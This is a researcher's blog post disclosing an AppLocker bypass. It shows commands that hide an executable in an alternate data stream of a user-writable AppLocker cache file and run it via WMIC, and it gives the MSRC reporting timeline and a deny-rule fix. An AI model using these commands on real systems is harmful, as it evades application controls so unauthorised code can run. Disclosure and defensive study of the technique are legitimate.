A small discovery about AppLocker

While I was prepping for a session a while back I made a a little special discovery about AppLocker. Turns out that the files that AppLocker uses under C:\Windows\System32\AppLocker can be used in many cases to bypass a Default AppLocker ruleset. When a machine is deployed and the first user logs in, that user will be added with full access to the following files under that folder:

  • AppCache.dat
  • AppCache.dat.LOG1
  • AppCache.dat.LOG2

This does not happen to any other users that logs onto the computer, only the first interactive logon after AppLocker is enabled.

So, how do we abuse this? Since it is likely that the first user that logs onto a computer is the main user. I was not able to directly write to the files since they are locked by AppLocker, but you can add additional Alternate Data Streams and get execution that way.

First you need to add the binary you want to execute into a stream of that file like this:

type evilfile.exe > C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe

After the file is added to the stream you can verify it by running the following command:

dir /a /r c:\windows\system32\AppLocker\AppCache.dat.LOG1

When you want to execute it you can for instance use WMIC to do that:

wmic process call create 'C:\Windows\System32\AppLocker\AppCache.dat.LOG1:evil.exe'

 

If you want to know more about Alternate Data streams you can always go and check out my posts on the topic right here:

https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/

I did report this to MSRC, but it did not meet the level needed to be serviced. I knew that before I sent it, but still I wanted MSRC to be aware of this. It is stated in this post that AppLocker will not be serviced:

https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria

To fix this you should create a deny rules blocking execution from the C:\Windows\System32\AppLocker path, and also remember to block alternate data stream from the same folder.

 

Timeline

May 10. 2019 – Report sent to MSRC
May 10, 2019 – Automated response about MSRC received it
May 11, 2019 – Response from MSRC that the submission does not meet the bar for servicing

 

Also a shout-out to @notajungman that helped me to verify this in a production environment. Thanks!

One thought on “A small discovery about AppLocker

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.